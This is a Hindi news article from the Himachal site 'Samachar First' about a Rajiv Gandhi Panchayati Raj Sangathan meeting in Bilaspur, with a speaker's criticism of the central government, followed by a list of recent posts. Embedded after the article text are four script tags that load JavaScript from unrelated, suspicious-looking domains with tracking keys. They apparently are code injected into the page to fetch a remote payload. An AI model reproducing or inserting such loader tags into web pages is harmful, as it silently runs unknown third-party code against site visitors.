Categories: हिमाचल

बिलासपुरः राजीव गांधी पंचायती राज संगठन की जिलाध्यक्ष कांता शर्मा की अध्यक्षता में बैठक संपन्न

<p>राजीव गांधी पंचायती राज संगठन का एक महत्वपूर्ण सम्मेलन संगठन की जिलाध्यक्ष कांता शर्मा की अध्यक्षता में मैहरी काथला में संपन्न हुआ। इसमें विभिन्न पंचायतों के चुने हुए प्रतिनिधियों औऱ भारी मात्रा में महिलाओं ने भाग लिया। बैठक में संगठन के राष्ट्रीय महासचिव और हिमाचल के प्रभारी जगदीप सिंह और हिमाचल प्रदेश के संयोजक दीपक राठौर ने मुख्य अतिथि के रूप में शिरकत की।</p>

<p>बैठक में विभिन्न मुद्दों पर चर्चा की गई बैठक को संबोधित करते हुए प्रदेश संयोजक दीपक राठौर ने कहा कि मजबूत लोकतंत्र के लिए पंचायतों का मजबूत होना जरूरी है। इसी के लिए संगठन काम कर रहा है। आज जो देश का माहौल बनाया जा रहा है उससे संविधान की अवहेलना हो रही है और लोकतंत्र पर खतरा मंडरा रहा है। केंद्र सरकार देश की मौजूदा समस्याओं से लोगों का ध्यान भटकाने के लिए औऱ अपने वोटों के ध्रुवीकरण के लिए धार्मिक उन्माद फैला कर आग से खेलने की कोशिश कर रही है। जो आने वाले भविष्य के लिए शुभ संकेत नहीं है। आज आर्थिक स्थिति सबसे बुरे दौर से गुजर रही है और बेरोजगारी लगातार बढ़ती जा रही है जिसके लिए सरकार के पास कोई योजना नहीं है।</p>

<p>उन्होंने कहा कि आज बिलासपुर को जरूरत है कि किरतपुर नेरचौक फोरलेन को पूरा किया जाए जो काफी समय से बंद पड़ा है। लेकिन सरकार इसकी ओर कोई ध्यान नहीं दे रही है। कांग्रेस पार्टी सीएए और एनआरसी की विरोधी नहीं है। लेकिन उसके पीछे जो भाजपा की मंशा छुपी हुई है कांग्रेस पार्टी उस का विरोध कर रही है। जाति औऱ धर्म के नाम पर होने वाले हर फैसले का विरोध जारी रहेगा। उन्होंने कहा कि देश के कानून धर्म के आधार पर नहीं मानवता के आधार पर होने चाहिए।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580102480273″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

9 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

10 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

10 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

10 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

11 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

11 hours ago